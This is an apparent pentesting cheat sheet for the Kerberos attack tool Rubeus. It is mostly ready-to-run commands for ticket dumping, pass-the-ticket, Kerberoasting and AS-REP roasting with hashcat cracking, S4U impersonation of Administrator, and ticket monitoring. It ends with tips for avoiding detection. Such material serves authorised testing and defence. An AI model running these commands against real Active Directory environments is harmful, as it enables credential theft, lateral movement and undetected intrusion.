Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Rubeus

Rubeus is a C# toolkit for Kerberos interaction and abuse, developed by Will Schroeder (harmj0y) as part of the GhostPack project. It provides extensive functionality for Kerberos ticket manipulation, credential extraction, and various Kerberos-based attacks.

Key Capabilities

  • Ticket Operations: Dump, request, renew, describe, and import Kerberos tickets
  • Pass the Ticket: Import tickets into the current session for lateral movement
  • Pass the Key / OverPass the Hash: Request TGTs using password hashes
  • Kerberoasting: Extract service ticket hashes for offline cracking
  • AS-REP Roasting: Extract hashes from accounts without pre-authentication
  • Constrained Delegation Abuse: S4U2Self and S4U2Proxy attacks
  • Ticket Forging: Create Golden and Silver tickets (with appropriate hashes)
  • PKINIT: Request TGTs using X.509 certificates (Pass-the-Certificate)

Installation

Rubeus is not installed via package managers. Compile from source or download pre-compiled:

https://github.com/GhostPack/Rubeus

Compile with Visual Studio or use pre-compiled versions from various pentesting resources.

Basic Usage

Dump All Tickets

Rubeus.exe dump /nowrap

The /nowrap option prevents line wrapping in Base64 output for easier copy-paste.

Triage (List Current Tickets)

Rubeus.exe triage

Request a TGT

Using NTLM hash (RC4):

Rubeus.exe asktgt /user:john /domain:domain.local /rc4:64F12CDDAA88057E06A81B54E73B949B /nowrap

Using AES256 hash:

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap

Using password:

Rubeus.exe asktgt /user:john /domain:domain.local /password:Password123! /nowrap

Request TGT and Import into Session

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt

PKINIT (Certificate Authentication)

Request TGT using an X.509 certificate instead of a hash. Used in Pass-the-Certificate attacks after obtaining certificates from AD CS exploitation or Shadow Credentials attacks.

Request TGT with PFX Certificate

Rubeus.exe asktgt /user:john /domain:domain.local /certificate:C:\path\to\cert.pfx /password:PfxPassword123 /nowrap

Request TGT with Base64 Certificate

Rubeus.exe asktgt /user:john /domain:domain.local /certificate:<base64_pfx> /password:<pfx_password> /ptt

PKINIT Options

OptionDescription
/certificate:<path_or_base64>Path to PFX file or Base64-encoded certificate
/password:<password>Password for the PFX file

Note: If PKINIT is not supported by the KDC, use tools like gettgtpkinit.py from PKINITtools or PassTheCert for LDAPS authentication.

Pass the Ticket (PtT)

Import .kirbi File

Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-john@krbtgt-domain.local.kirbi

Import Base64 Ticket

Rubeus.exe ptt /ticket:doIFqDCCBaSgAwIBBaEDAgEWooIEoj...

After importing, access resources in the user’s context:

dir \\DC01.domain.local\c$

Sacrificial Process (createnetonly)

Create a new logon session to avoid overwriting existing tickets:

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

In the spawned window, request and import a ticket:

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt

Use PowerShell remoting to access the target:

Enter-PSSession -ComputerName DC01

Kerberoasting

Extract All Kerberoastable Hashes

Rubeus.exe kerberoast /nowrap

Specific User

Rubeus.exe kerberoast /user:svc_mssql /nowrap

Hashcat-Compatible Format

Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast.txt

Request AES Tickets (Harder to Crack)

Rubeus.exe kerberoast /aes /nowrap

Crack with Hashcat:

hashcat -m 13100 kerberoast.txt wordlist.txt

AS-REP Roasting

Target accounts with “Do not require Kerberos preauthentication” enabled:

Extract All AS-REP Roastable Hashes

Rubeus.exe asreproast /nowrap

Specific User

Rubeus.exe asreproast /user:svc_backup /nowrap

Hashcat Format

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Crack with Hashcat:

hashcat -m 18200 asrep.txt wordlist.txt

Request Service Tickets (asktgs)

Request a TGS using an existing TGT:

Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/fileserver.domain.local /nowrap

Request and import:

Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/fileserver.domain.local /ptt

Constrained Delegation Abuse (S4U)

When a service account has constrained delegation configured:

Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.domain.local /ptt

With alternate service:

Rubeus.exe s4u /user:svc_sql /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.domain.local /altservice:http /ptt

Ticket Operations

Describe a Ticket

Rubeus.exe describe /ticket:<base64_or_path>

Shows ticket details including:

  • Service name
  • User name
  • Start/End times
  • Flags
  • Encryption type

Renew a TGT

Rubeus.exe renew /ticket:<base64_or_path> /nowrap

Purge All Tickets

Rubeus.exe purge

Purge Specific LUID

Rubeus.exe purge /luid:0x6c680

Hash Calculation

Calculate Kerberos hashes from a plaintext password:

Rubeus.exe hash /user:john /domain:domain.local /password:Password123!

Output:

rc4_hmac             : 64F12CDDAA88057E06A81B54E73B949B
aes128_cts_hmac_sha1 : 9e5f1e63b7b3e8f...
aes256_cts_hmac_sha1 : b21c99fc068e3ab...
des_cbc_md5          : ...

Monitoring for Tickets

Monitor for new TGTs (useful during lateral movement):

Rubeus.exe monitor /interval:5

Filter for specific user:

Rubeus.exe monitor /interval:5 /filteruser:Administrator

Common Options

OptionDescription
/nowrapDon’t wrap Base64 output
/pttImport ticket into current session
/dc:<ip>Specify domain controller
/domain:<domain>Specify domain name
/user:<user>Specify username
/outfile:<path>Save output to file
/luid:<luid>Target specific logon session
/format:hashcatOutput in Hashcat-compatible format

PowerShell Helpers

Convert .kirbi to Base64

[Convert]::ToBase64String([IO.File]::ReadAllBytes("ticket.kirbi"))

Convert Base64 to .kirbi

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64>"))

Detection and Evasion

Common Detection Points

  • Unusual Kerberos ticket requests (Event ID 4768, 4769)
  • Service ticket requests for sensitive SPNs
  • AS-REQ without pre-authentication
  • High volume of TGS requests (Kerberoasting)

Evasion Techniques

  • Use AES encryption instead of RC4 (less suspicious)
  • Use /opsec flag for reduced detection footprint
  • Limit ticket requests to avoid anomaly detection
  • Use sacrificial processes to isolate activity
ToolDescription
MimikatzWindows credential extraction and ticket manipulation
ImpacketPython toolkit with GetTGT, GetST, GetUserSPNs
KekeoAdvanced Kerberos toolkit by gentilkiwi
PowerViewPowerShell AD enumeration
BloodHoundAD attack path mapping

Core Takeaways

  • Use /nowrap for Base64 output to simplify copy-paste
  • asktgt with /ptt is the quickest way to request and use a ticket
  • createnetonly prevents overwriting your current session’s tickets
  • Kerberoasting and AS-REP roasting are key techniques for credential extraction
  • S4U attacks enable impersonation when constrained delegation is configured
  • AES256 is preferred over RC4 for both security and stealth